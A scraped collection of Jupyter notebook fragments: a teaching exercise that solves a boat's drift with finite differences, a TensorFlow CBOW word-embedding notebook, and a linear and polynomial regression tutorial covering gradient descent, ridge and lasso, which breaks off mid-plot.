df_orcas['is_exact_url_match'] = df_orcas.apply(lambda i: exact_url_match(i['D_URL'], i['Query']), axis=1)
df_orcas.to_json('/mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/orcas-with-exact-url-match-field.tsv', lines=True, orient='records')
!head -5 /mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/orcas-with-exact-url-match-field.tsv
(len(df_orcas[df_orcas['is_exact_url_match'] == True]))/len(df_orcas)
df_orcas[df_orcas['is_exact_url_match'] == True]
df_orcas[df_orcas['is_exact_url_match'] == False]
```
###### Content under Creative Commons Attribution license CC-BY 4.0, code under BSD 3-Clause License © 2019 by D. Koehn, notebook style sheet by L.A. Barba, N.C. Clementi
```
# Execute this cell to load the notebook's style sheet, then ignore it
from IPython.core.display import HTML
css_file = '../style/custom.css'
HTML(open(css_file, "r").read())
```
# Exercise: How to sail without wind
Imagine the BSc students of the "Differential Equations in the Earth System" course are organizing a sailing trip in the Kiel Bay area and the Baltic Sea. Unfortunately, the strong wind gusts predicted by the meteorologists never arrive, not even as a small breeze. Sometimes even physicists are not able to predict the future; we will learn why in the next lecture.
Fortunately, the oceanographers can deliver sea current data of the specified area. So how can the students sail without wind and stay on course? By letting their thoughts and boat drift and solving the simplest, uncoupled ordinary differential equation, I can imagine.
## Governing equations
The velocity vector field ${\bf{V}} = (v_x,v_y)^T$ is componentwise related to the spatial coordinates ${\bf{x}} = (x,y)^T$ by
\begin{equation}
v_x = \frac{dx}{dt},\; v_y = \frac{dy}{dt}
\end{equation}
To estimate the drift or **streamline** of our boat in the velocity vector field $\bf{V}$, starting from an initial position ${\bf{x_0}} = (x_0,y_0)^T$, we have to solve the uncoupled ordinary differential equations using the finite difference method introduced at the beginning of this class.
Approximating the temporal derivatives in eqs. (1) using the **backward FD operator**
\begin{equation}
\frac{df}{dt} \approx \frac{f(t)-f(t-dt)}{dt} \notag
\end{equation}
with the time sample interval $dt$ leads to
\begin{equation}
\begin{split}
v_x &= \frac{x(t)-x(t-dt)}{dt}\\
v_y &= \frac{y(t)-y(t-dt)}{dt}\\
\end{split}
\notag
\end{equation}
After solving for $x(t), y(t)$, we get the **explicit time integration scheme**:
\begin{equation}
\begin{split}
x(t) &= x(t-dt) + dt\; v_x\\
y(t) &= y(t-dt) + dt\; v_y\\
\end{split}
\notag
\end{equation}
and by introducing a temporal discretization $t^n = n\, dt$ with $n \in [0,1,...,nt]$, where $nt$ denotes the number of time steps, the final FD scheme becomes:
\begin{equation}
\begin{split}
x^n &= x^{n-1} + dt\; v_x^{n-1}\\
y^n &= y^{n-1} + dt\; v_y^{n-1}\\
\end{split}
\end{equation}
These equations simply state that we can extrapolate the next position of our boat $(x^{(n)},y^{(n)})^T$ in the velocity vector field, based on the position at the previous time step $(x^{(n-1)},y^{(n-1)})^T$, the velocity field at this previous position $(v_x^{(n-1)},v_y^{(n-1)})^T$ and a predefined time step $dt$. Before implementing the FD scheme in Python, let's try to find a simple velocity vector field ...
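As a quick sanity check, the explicit scheme can first be applied to a scalar ODE with a known solution, $dy/dt = -y$ with $y(0) = 1$, whose exact solution is $y(t) = e^{-t}$. This is a minimal sketch, independent of the sailing exercise below:

```python
import numpy as np

def euler(f, y0, dt, nt):
    # explicit time integration: y^n = y^(n-1) + dt * f(y^(n-1))
    y = np.zeros(nt + 1)
    y[0] = y0
    for n in range(1, nt + 1):
        y[n] = y[n - 1] + dt * f(y[n - 1])
    return y

y = euler(lambda y: -y, y0=1.0, dt=0.001, nt=1000)
print(y[-1], np.exp(-1.0))  # numerical vs. exact value of y(1)
```

With $dt = 0.001$ the numerical value of $y(1)$ agrees with $e^{-1}$ to about four digits; increasing $dt$ increases this error, a point we will return to later.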
## Boring velocity vector field
We should start with a simple, boring velocity vector field, where we can easily predict the drift of the boat. Let's take this one:
\begin{equation}
{\bf{V}} = (y,-x)^T \notag
\end{equation}
and visualize it with Matplotlib using a `Streamplot`. First, we load all required libraries ...
```
# Import Libraries
# ----------------
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from pylab import rcParams
# Ignore Warning Messages
# -----------------------
import warnings
warnings.filterwarnings("ignore")
```
... and define the coordinates for the `Streamplot`:
```
dh = 50.
x1 = -1000.
x2 = 1000.
X, Y = np.meshgrid(np.arange(x1, x2, dh), np.arange(x1, x2, dh))
```
For more flexibility, and to avoid code redundancy later on, we write a short function which evaluates the velocity components $(v_x,v_y)^T$ at a given position $(x,y)^T$
```
# compute velocity components V = (vx,vy)^T at position x,y
def vel_xy(x,y):
vx = y / 1000.
vy = -x / 1000.
return vx, vy
```
After these preparations, we can plot the velocity vector field
```
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for coordinates X,Y
VX,VY = vel_xy(X,Y)
ax1.set_title(r'Plot of velocity vector field $V=(y,-x)^T$')
plt.axis('equal')
Q = ax1.streamplot(X,Y,VX,VY)
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.savefig('Plot_vector_field_V_boring.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
So the velocity vector field ${\bf{V}} = (y,-x)^T$ is simply a large vortex with zero velocity at the origin and linearly increasing velocities with distance.
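In fact, the circular shape of the streamlines can be verified analytically: along any trajectory of this field, the squared distance from the origin is conserved,
\begin{equation}
\frac{d}{dt}\left(x^2 + y^2\right) = 2x\,\frac{dx}{dt} + 2y\,\frac{dy}{dt} = 2x\,v_x + 2y\,v_y = 2xy - 2yx = 0, \notag
\end{equation}
so the exact drift follows a circle $x^2 + y^2 = \mathrm{const}$ (the scaling factor $1/1000$ used in `vel_xy` does not change this conclusion).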
### Sailing in the boring vector field $V =(y,-x)^T$
Next, we want to predict our sailing course in this large vortex. Even though it is unrealistic, we assume that such a large vortex exists in the [Kiel Fjord](https://en.wikipedia.org/wiki/Kieler_F%C3%B6rde#/media/File:Kiel_Luftaufnahme.JPG), maybe related to some suspicious, top secret activity in the Kiel military harbor.
##### Exercise 1
Complete the following Python code `sailing_boring`, to predict the sailing course in the boring velocity vector field $V =(y,-x)^T$. Most of the code is already implemented, you only have to add the FD solution of the uncoupled, ordinary differential equations (2):
```
def sailing_boring(tmax, dt, x0, y0):
# Compute number of time steps based on tmax and dt
nt = (int)(tmax/dt)
# vectors for storage of x, y positions
x = np.zeros(nt + 1)
y = np.zeros(nt + 1)
# define initial position
x[0] = x0
y[0] = y0
# start time stepping over time samples n
for n in range(1,nt + 1):
# compute velocity components at current position
vx, vy = vel_xy(x[n-1],y[n-1])
# compute new position using FD approximation of time derivative
# ADD FD SOLUTION OF THE UNCOUPLED, ORDINARY DIFFERENTIAL EQUATIONS (2) HERE!
x[n] =
y[n] =
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for Streamplot
VX,VY = vel_xy(X,Y)
ax1.set_title(r'Streamplot of vector field $V=(y,-x)^T$')
plt.axis('equal')
Q = ax1.streamplot(X,Y,VX,VY)
plt.plot(x,y,'r-',linewidth=3)
# mark initial and final position
plt.plot(x[0],y[0],'ro')
plt.plot(x[nt],y[nt],'go')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.savefig('sailing_boring.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
##### Exercise 2
After completing the FD code `sailing_boring`, we can define some basic modelling parameters. How long do you want to sail? This is defined by the parameter $tmax$ [s]. What time step $dt$ do you want to use? $dt=1\;s$ should work for the first test of your FD code. To solve the problem you also have to define the initial position of your boat. Let's assume that ${\bf{x_{0}}}=(-900,0)^T$ is the location of some jetty on the western shore of the Kiel Fjord.
By executing the cell below (`SHIFT+ENTER`), the FD code `sailing_boring` should compute the course of the boat and plot it as a red line on top of the `Streamplot`. Initial and final position are marked by a red and a green dot, respectively.
What course would you expect, based on the `Streamplot`? Is it confirmed by your FD code solution? If not, there might be an error in your FD implementation.
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 1.
# Define initial position
x0 = -900.
y0 = 0.
# Sail for tmax s in the boring vector field
sailing_boring(tmax, dt, x0, y0)
```
##### Exercise 3
At this point you might get an idea why the code is called `sailing_boring`. We start at the western shore of the Kiel Fjord, follow a closed streamline to the eastern shore and travel back to the initial position of the jetty - it's a boring Kiel harbor tour.
How long will the boring tour actually take? Vary $tmax$ until the green dot of the final position coincides with the red dot of the initial position.
You might also think: why should I invest so much computation time into this boring tour?
Copy the cell above below this text box and increase the time step $dt$ to 20 s. How does the new FD solution differ from the one above with $dt=1\;s$? Give a possible explanation.
### Sailing in the more exciting vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$
Time to sail in a more complex and exciting velocity vector field, like this one:
\begin{equation}
{\bf{V}}=(\cos((x+y)/500),\sin((x-y)/500))^T \notag
\end{equation}
As in the case of the boring vector field, we define a function to compute the velocity components for a given ${\bf{x}} = (x,y)^T$:
```
# define new vector field
def vel_xy_1(x,y):
vx = np.cos((x+y)/500)
vy = np.sin((x-y)/500)
return vx, vy
```
For the visualization of this more complex vector field, I recommend using a `Quiver` plot instead of the `Streamplot`
```
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for coordinates X,Y
VX,VY = vel_xy_1(X,Y)
ax1.set_title(r'Plot of vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$')
plt.axis('equal')
Q = ax1.quiver(X,Y,VX,VY)
plt.plot(392,392,'ro')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
#plt.savefig('Plot_vector_field_V_exciting.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
##### Exercise 4
Now, this velocity vector field looks more exciting than the previous one. The red dot at ${\bf{x_{island}}}=(392,392)^T$ marks the location of an island you want to reach. To compute the course, we can recycle most parts of the `sailing_boring` code.
- Rename the code below from `sailing_boring` to `sailing_exciting`
- Add the FD solution of the uncoupled, ordinary differential equations (2) to the code
- In the new `sailing_exciting` code, replace the function calls to the boring velocity field `vel_xy` with calls to the new exciting velocity field `vel_xy_1`
- Replace the `Streamplot` in `sailing_exciting` with a `Quiver` plot.
- Mark the position of the island by a red dot by inserting
```python
plt.plot(392,392,'ro')
```
below the `Quiver` plot in `sailing_exciting`
```
def sailing_boring(tmax, dt, x0, y0):
# Compute number of time steps
nt = (int)(tmax/dt)
# vectors for storage of x, y positions
x = np.zeros(nt + 1)
y = np.zeros(nt + 1)
# define initial position
x[0] = x0
y[0] = y0
# start time stepping
for n in range(1,nt + 1):
# compute velocity components at current position
vx, vy = vel_xy(x[n-1],y[n-1])
# compute new position using FD approximation of time derivative
# ADD FD SOLUTION OF THE UNCOUPLED, ORDINARY DIFFERENTIAL EQUATIONS (2) HERE!
x[n] =
y[n] =
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for quiver plot
VX,VY = vel_xy(X,Y)
ax1.set_title(r'Plot of vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$')
plt.axis('equal')
Q = ax1.streamplot(X,Y,VX,VY)
plt.plot(x,y,'r-',linewidth=3)
# mark initial and final position
plt.plot(x[0],y[0],'ro')
plt.plot(x[nt],y[nt],'go')
print(x[nt],y[nt])
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.savefig('sailing_exciting.pdf', bbox_inches='tight', format='pdf')
plt.show()
```
##### Exercise 5
Time to sail to the island. To make the problem more interesting, you have to find a course to the island from the north, south, east and west boundaries. In each of the four cells below, one of the x0/y0 coordinates of the given boundary is already defined. You only have to add the missing coordinate component and adjust it until you reach the island. You might also have to modify $tmax$.
**Approach from the northern boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT NORTHERN BOUNDARY HERE!
x0 =
y0 = 950.
# Sail for tmax s in the exciting vector field
sailing_exciting(tmax, dt, x0, y0)
```
**Approach from the southern boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT SOUTHERN BOUNDARY HERE!
x0 =
y0 = -980.
# Sail for tmax s in the exciting vector field
sailing_exciting(tmax, dt, x0, y0)
```
**Approach from the western boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT WESTERN BOUNDARY HERE!
x0 = -950.
y0 =
# Sail for tmax s in the exciting vector field
sailing_exciting(tmax, dt, x0, y0)
```
**Approach from the eastern boundary**
```
# How long do you want to sail [s] ?
tmax = 1000
# Define time step dt
dt = 2.
# DEFINE INTIAL POSITION AT EASTERN BOUNDARY HERE!
x0 = 990.
y0 =
# Sail for tmax s in the exciting vector field
sailing_exciting(tmax, dt, x0, y0)
```
##### Bonus Exercise
How do you reach the blue island in the vector plot below?
```
# Define figure size
rcParams['figure.figsize'] = 8, 8
fig1, ax1 = plt.subplots()
# Define vector field components for coordinates X,Y
VX,VY = vel_xy_1(X,Y)
ax1.set_title(r'Plot of vector field $V=(cos((x+y)/500),sin((x-y)/500))^T$')
plt.axis('equal')
Q = ax1.quiver(X,Y,VX,VY)
plt.plot(-392,-392,'bo')
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.show()
```
## What we learned
- How to solve a simple system of ordinary differential equations by an explicit time integration scheme
- The long-term impact of small inaccuracies in time integration schemes by choosing a too large time step $dt$
- The solution to a problem is not only defined by a differential equation, but also by an initial condition
- How to sail without wind, by using flow data and numerical solutions of ordinary differential equations
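The long-term impact of the time step can be quantified for the boring vortex field: one forward-Euler step of ${\bf{V}}=(y/L,-x/L)$ with $L=1000\,m$ maps $(x,y)$ to $(x + dt\,y/L,\; y - dt\,x/L)$, which scales the squared radius by $1+(dt/L)^2$. The numerical boat therefore slowly spirals outward instead of staying on a circle. A minimal sketch of the accumulated growth factor:

```python
def radius_growth(tmax, dt, L=1000.0):
    # One forward-Euler step on V = (y/L, -x/L) maps (x, y) to
    # (x + dt*y/L, y - dt*x/L), which scales r^2 = x^2 + y^2 by 1 + (dt/L)^2.
    nt = int(tmax / dt)
    return (1.0 + (dt / L) ** 2) ** (nt / 2)

print(radius_growth(1000, 1.0))   # barely visible drift
print(radius_growth(1000, 20.0))  # clearly visible outward spiral
```

Over $tmax = 1000\,s$, $dt = 1\,s$ grows the radius by roughly 0.05 %, while $dt = 20\,s$ grows it by roughly 1 % - consistent with the mismatch between the red and green dots observed in Exercise 3.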
| github_jupyter |
- Tensor board projection
- Visualizing loss and network on tensorboard
- Comments
```
%reload_ext autoreload
%autoreload 2
%matplotlib inline
import mpld3
mpld3.enable_notebook()
from pylab import rcParams
rcParams['figure.figsize'] = 10, 10
import sys
import numpy as np
import random
import math
import tensorflow as tf
import matplotlib.pyplot as plt
sys.path.append("./../../Utils/")
from readWikiData import get_wikipedia_data
```
##### Get representation
```
sentences, word2idx, idx2word, _ = get_wikipedia_data(n_files=10, n_vocab=1000, by_paragraph=True)
def get_wiki_data_cbow(sentences, word2idx, window_size=5):
training_data = []
vocab_size = len(word2idx)
for sentence in sentences:
if len(sentence) < window_size * 2 + 1:
continue
for i in range(len(sentence)):
left_context = sentence[max(i-window_size, 0): i]
right_context = sentence[i+1:window_size + i + 1]
centre = sentence[i]
if len(left_context + right_context) < (2*window_size):
len_left = len(left_context)
len_right = len(right_context)
if len_left < len_right:
right_context = sentence[i+1 : window_size + i + 1 + (len_right - len_left)]
else:
left_context = sentence[max(i-window_size - (len_left - len_right), 0): i]
temp = left_context + right_context
if len(temp) < window_size * 2:
print(sentence)
print(left_context)
print(right_context)
print(centre)
break
training_data.append((tuple(temp), centre))
print(training_data[:10])
training_data = list(set(training_data))
idx2word = {v: k for k, v in word2idx.items()}
return len(word2idx), training_data, word2idx, idx2word
vocab_size, training_data, word2idx, idx2word = get_wiki_data_cbow(sentences, word2idx)
len(training_data)
training_data[:10]
```
##### Get batches
```
bucket_list = []
def getNextBatchCbow(bi_grams_, window_size=5, batch_size=10000):
global bucket_list
docs_ids_to_select = list(set(bi_grams_) - set(bucket_list))
if len(docs_ids_to_select) < batch_size:
bucket_list = []
docs_ids_to_select = bi_grams_
# Initialize two variables
train_X = np.ndarray(shape=(batch_size, window_size*2), dtype=np.int32)
train_label = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
# Get a random set of docs
random_docs = random.sample(docs_ids_to_select, batch_size)
bucket_list += random_docs
index = 0
# Iterate through all the docs
for item in random_docs:
train_X[index] = item[0]
train_label[index] = item[1]
index += 1
return train_X, train_label
#getNextBatchCbow(training_data, 2)
```
##### Let's design the graph
```
def init_weight(Mi, Mo):
shape_sum = float(Mi + Mo)
return np.random.uniform(-np.sqrt(6/shape_sum),np.sqrt(6/shape_sum), [Mi, Mo])
embedding_size_w = 100
vocab_size = len(word2idx)
n_neg_samples = 20
learning_rate = 10e-5
epochs = 2
batch_size=10000
mu = 0.99
window_size = 5
# Define placeholders for training
train_X = tf.placeholder(tf.int32, shape=[batch_size, None])
train_label = tf.placeholder(tf.int32, shape=[batch_size, 1])
# Define matrix for doc_embedding and word_embedding
W1 = tf.Variable(init_weight(vocab_size, embedding_size_w), name="W1", dtype=tf.float32)
# Define weights for the output unit
W2 = tf.Variable(init_weight(vocab_size, embedding_size_w), name="W2", dtype=tf.float32)
biases = tf.Variable(tf.zeros(vocab_size))
print(train_X.get_shape(), train_label.get_shape(), W1.get_shape(), W2.get_shape())
embed = []
# generating a vector of size embedding_size_d
embed_w = tf.zeros([1, embedding_size_w], dtype=tf.float32)
# add all the word vecs in window_size
for j in range(window_size*2):
embed_w += tf.nn.embedding_lookup(W1, train_X[:, j])
#embed.append(embed_w)
#embed = tf.concat(1, embed)/(window_size*2)
embed = embed_w/(window_size*2)
print(embed.get_shape())
loss = tf.nn.sampled_softmax_loss(weights=W2, \
biases=biases, \
labels=train_label, \
inputs=embed, \
num_sampled=n_neg_samples, \
num_classes=vocab_size)
loss = tf.reduce_mean(loss)
#optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=mu).minimize(loss)
#optimizer = tf.train.AdagradOptimizer(learning_rate).minimize(loss)
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = 0.01
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
1000, 0.96, staircase=True)
# Passing global_step to minimize() will increment it at each step.
optimizer = (
tf.train.MomentumOptimizer(learning_rate, momentum=mu).minimize(loss, global_step=global_step)
)
saver = tf.train.Saver()
with tf.Session() as sess:
init = tf.global_variables_initializer()
sess.run(init)
average_loss = 0
for step in range(epochs):
epoch_error = 0.0
temp_X , temp_labels = getNextBatchCbow(window_size=5, bi_grams_=training_data)
feed_dict = {train_X : temp_X, train_label : temp_labels}
op, l = sess.run([optimizer, loss],
feed_dict=feed_dict)
epoch_error += l
if step % 100 == 0:
print("Error at epoch:", step, "=", epoch_error)
save_path = saver.save(sess, "./models/model_cbow_model.ckpt")
print("Model saved in file: %s" % save_path)
```
##### Embeddings
```
W1_embedding = None
W2_embedding = None
with tf.Session() as sess:
saver = tf.train.Saver()
# Restore variables from disk.
saver.restore(sess, "./models/model_cbow_model.ckpt")
print("Model restored.")
# Normalize word2vec
W1_embedding = W1.eval()
# Normalize word2vec
W2_embedding = W2.eval()
W1_embedding.shape
W2_embedding.shape
word2vec = np.mean([W1_embedding, W2_embedding], axis=0)
word2vec.shape
```
##### Projection of embeddings using t-SNE
```
idx2word = {v:k for k, v in word2idx.items()}
from sklearn.manifold import TSNE
model = TSNE()
Z = model.fit_transform(word2vec)
plt.scatter(Z[:,0], Z[:,1])
for i in range(len(idx2word)):
try:
plt.annotate(idx2word[i], xy=(Z[i, 0], Z[i, 1]))
except ValueError:
print("bad string:", idx2word[i])
plt.show()
```
| github_jupyter |
<a href="https://colab.research.google.com/github/Priyam145/MLprojects/blob/main/notebooks/LinearRegression_maths.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import numpy as np
X = 2 * np.random.rand(100, 1)
y = 4 + 3 * X + np.random.randn(100, 1)
import matplotlib.pyplot as plt
import seaborn as sns
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor("white")
plt.scatter(X, y);
axs.set_xlabel('X')
axs.set_ylabel('y')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0)
X_b = np.c_[np.ones((100, 1)), X]
theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)
X_b[:5]
theta_best
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor("white")
plt.scatter(X, y);
plt.plot(X, X_b.dot(theta_best), color='red', label='Prediction line')
axs.set_xlabel('X')
axs.set_ylabel('y')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0)
plt.legend();
X_new = np.array([[0], [2]])
X_new_b = np.c_[np.ones((2, 1)), X_new] # add x0 = 1 to each instance
y_predict = X_new_b.dot(theta_best)
y_predict
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(X, y)
lin_reg.intercept_, lin_reg.coef_
lin_reg.predict(X_new)
theta_best_svd, residuals, rank, s = np.linalg.lstsq(X_b, y, rcond=1e-6)
theta_best_svd
np.linalg.pinv(X_b).dot(y)
eta = 0.1
n_iterations = 1000
m = 100
fig, axs = plt.subplots(figsize=(15, 10))
fig.set_facecolor("white")
plt.scatter(X, y);
axs.set_xlabel(r'$X_1$')
axs.set_ylabel('y')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0)
theta = np.random.randn(2, 1)
for iteration in range(n_iterations):
gradients = 2/m*X_b.T.dot(X_b.dot(theta) - y)
theta = theta - eta * gradients
if iteration < 10:
plt.plot(X, X_b.dot(theta), label=f'iteration {iteration+1}')
axs.set_title('{eta}'.format(eta=r'$\eta = 0.1$'))
plt.legend();
theta
```
# Stochastic Gradient Descent
```
n_epochs = 50
t0, t1 = 5, 50 # learning schedule hyperparamters
def learning_schedule(t):
return t0 / (t + t1)
theta = np.random.randn(2, 1) # random initialization
for epoch in range(n_epochs):
for i in range(m):
random_index = np.random.randint(m)
xi = X_b[random_index:random_index + 1]
yi = y[random_index:random_index + 1]
gradients = 2 * xi.T.dot(xi.dot(theta) - yi)
eta = learning_schedule(epoch * m + i)
theta = theta - eta * gradients
theta
from sklearn.linear_model import SGDRegressor
sgd_reg = SGDRegressor(max_iter=1000, tol=1e-3, penalty=None, eta0=0.1)
sgd_reg.fit(X, y.ravel())
sgd_reg.intercept_, sgd_reg.coef_
```
# Mini-Batch Gradient Descent
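This section has no code of its own, so here is a minimal sketch of mini-batch gradient descent on the same synthetic linear data ($y = 4 + 3x + \text{noise}$) used above; the batch size is an illustrative choice, and the learning schedule reuses the hyperparameters from the SGD section:

```python
import numpy as np

np.random.seed(42)
m = 100
X = 2 * np.random.rand(m, 1)
y = 4 + 3 * X + np.random.randn(m, 1)
X_b = np.c_[np.ones((m, 1)), X]  # add the bias column x0 = 1

t0, t1 = 5, 50  # same learning schedule hyperparameters as in the SGD section

def learning_schedule(t):
    return t0 / (t + t1)

theta = np.random.randn(2, 1)  # random initialization
batch_size = 20
n_iterations = 500

for t in range(n_iterations):
    idx = np.random.randint(m, size=batch_size)  # draw a random mini-batch
    xi, yi = X_b[idx], y[idx]
    gradients = 2 / batch_size * xi.T.dot(xi.dot(theta) - yi)
    theta = theta - learning_schedule(t) * gradients

print(theta.ravel())  # should land near the true parameters [4, 3]
```

Mini-batch GD trades the smooth trajectory of batch GD for cheaper steps, while averaging over a batch keeps the gradient less noisy than pure SGD.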
# Polynomial Regression
```
m = 100
X = 6 * np.random.rand(m, 1) - 3
y = 0.5 * X**2 + X + 2 + np.random.randn(m, 1)
fig, axs = plt.subplots(figsize=(15, 10))
fig.set_facecolor("white")
plt.scatter(X, y);
axs.set_xlabel(r'$X_1$')
axs.set_ylabel('y')
axs.set_xlim(xmin=-3)
axs.set_ylim(ymin=0);
from sklearn.preprocessing import PolynomialFeatures
poly_features = PolynomialFeatures(degree=2, include_bias=False)
X_poly = poly_features.fit_transform(X)
X[0]
X_poly[0]
lin_reg = LinearRegression()
lin_reg.fit(X_poly, y)
lin_reg.intercept_, lin_reg.coef_
fig, axs = plt.subplots(figsize=(15, 10))
fig.set_facecolor("white")
plt.scatter(X, y)
X_new=np.linspace(-3, 3, 100).reshape(100, 1)
X_new_poly = poly_features.transform(X_new)
y_new = lin_reg.predict(X_new_poly)
plt.plot(X_new, y_new, "r-", linewidth=2, label="Predictions")
axs.set_xlabel(r'$X_1$')
axs.set_ylabel('y')
axs.set_xlim(xmin=-3)
axs.set_ylim(ymin=0);
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor('white')
for style, width, degree in (("g-", 1, 300), ("b--", 2, 2), ("r-+", 2, 1)):
polybig_features = PolynomialFeatures(degree=degree, include_bias=False)
std_scaler = StandardScaler()
lin_reg = LinearRegression()
polynomial_regression = Pipeline([
("poly_features", polybig_features),
("std_scaler", std_scaler),
("lin_reg", lin_reg),
])
polynomial_regression.fit(X, y)
y_newbig = polynomial_regression.predict(X_new)
plt.plot(X_new, y_newbig, style, label=str(degree), linewidth=width)
plt.plot(X, y, "b.", linewidth=3)
plt.legend(loc="upper left")
plt.xlabel("$x_1$", fontsize=18)
plt.ylabel("$y$", rotation=0, fontsize=18)
plt.axis([-3, 3, 0, 10])
plt.show()
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
def plot_learning_curves(model, X, y):
fig, axs = plt.subplots(figsize=(10, 7))
fig.set_facecolor('white')
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)
train_errors, val_errors = [], []
for m in range(1, len(X_train)):
model.fit(X_train[:m], y_train[:m])
y_train_predict = model.predict(X_train[:m])
y_val_predict = model.predict(X_val)
train_errors.append(mean_squared_error(y_train[:m], y_train_predict))
val_errors.append(mean_squared_error(y_val, y_val_predict))
plt.plot(np.sqrt(train_errors), 'r-+', linewidth=2, label='train')
plt.plot(np.sqrt(val_errors), 'b-', linewidth=3, label='val')
axs.set_xlabel('Training set size')
axs.set_ylabel('RMSE')
axs.set_xlim(xmin=0)
axs.set_ylim(ymin=0, ymax=3.0)
plt.legend()
lin_reg = LinearRegression()
plot_learning_curves(lin_reg, X, y)
from sklearn.pipeline import Pipeline
polynomial_regression = Pipeline([
("poly_features", PolynomialFeatures(degree=10, include_bias=False)),
("lin_reg", LinearRegression())
])
plot_learning_curves(polynomial_regression, X, y)
```
# Ridge Regression
```
from sklearn.linear_model import Ridge
ridge_reg = Ridge(alpha=1, solver='cholesky')
ridge_reg.fit(X, y)
ridge_reg.predict([[1.5]])
sgd_reg = SGDRegressor(penalty='l2')
sgd_reg.fit(X, y.ravel())
sgd_reg.predict([[1.5]])
```
# Lasso Regression
```
from sklearn.linear_model import Lasso
lasso_reg = Lasso(alpha=0.1)
lasso_reg.fit(X, y)
lasso_reg.predict([[1.5]])
lasso_reg = SGDRegressor(penalty='l1')
lasso_reg.fit(X, y.ravel())
lasso_reg.predict([[1.5]])
t1a, t1b, t2a, t2b = -1, 3, -1.5, 1.5
t1s = np.linspace(t1a, t1b, 500)
t2s = np.linspace(t2a, t2b, 500)
t1, t2 = np.meshgrid(t1s, t2s)
print(t1.shape)
T = np.c_[t1.ravel(), t2.ravel()]
Xr = np.array([[1, 1], [1, -1], [1, 0.5]])
yr = 2 * Xr[:, :1] + 0.5 * Xr[:, 1:]
J = (1/len(Xr) * np.sum((T.dot(Xr.T) - yr.T)**2, axis=1)).reshape(t1.shape)
N1 = np.linalg.norm(T, ord=1, axis=1).reshape(t1.shape)
N2 = np.linalg.norm(T, ord=2, axis=1).reshape(t1.shape)
t_min_idx = np.unravel_index(np.argmin(J), J.shape)
t1_min, t2_min = t1[t_min_idx], t2[t_min_idx]
t_init = np.array([[0.25], [-1]])
def bgd_path(theta, X, y, l1, l2, core = 1, eta = 0.05, n_iterations = 200):
path = [theta]
for iteration in range(n_iterations):
gradients = core * 2/len(X) * X.T.dot(X.dot(theta) - y) + l1 * np.sign(theta) + l2 * theta
theta = theta - eta * gradients
path.append(theta)
return np.array(path)
fig, axes = plt.subplots(2, 2, sharex=True, sharey=True, figsize=(10.1, 8))
fig.set_facecolor('white')
for i, N, l1, l2, title in ((0, N1, 2., 0, "Lasso"), (1, N2, 0, 2., "Ridge")):
JR = J + l1 * N1 + l2 * 0.5 * N2**2
tr_min_idx = np.unravel_index(np.argmin(JR), JR.shape)
t1r_min, t2r_min = t1[tr_min_idx], t2[tr_min_idx]
levelsJ=(np.exp(np.linspace(0, 1, 20)) - 1) * (np.max(J) - np.min(J)) + np.min(J)
levelsJR=(np.exp(np.linspace(0, 1, 20)) - 1) * (np.max(JR) - np.min(JR)) + np.min(JR)
levelsN=np.linspace(0, np.max(N), 10)
path_J = bgd_path(t_init, Xr, yr, l1=0, l2=0)
path_JR = bgd_path(t_init, Xr, yr, l1, l2)
path_N = bgd_path(np.array([[2.0], [0.5]]), Xr, yr, np.sign(l1)/3, np.sign(l2), core=0)
ax = axes[i, 0]
ax.grid(True)
ax.axhline(y=0, color='k')
ax.axvline(x=0, color='k')
ax.contourf(t1, t2, N / 2., levels=levelsN)
ax.plot(path_N[:, 0], path_N[:, 1], "y--")
ax.plot(0, 0, "ys")
ax.plot(t1_min, t2_min, "ys")
ax.set_title(r"$\ell_{}$ penalty".format(i + 1), fontsize=16)
ax.axis([t1a, t1b, t2a, t2b])
if i == 1:
ax.set_xlabel(r"$\theta_1$", fontsize=16)
ax.set_ylabel(r"$\theta_2$", fontsize=16, rotation=0)
ax = axes[i, 1]
ax.grid(True)
ax.axhline(y=0, color='k')
ax.axvline(x=0, color='k')
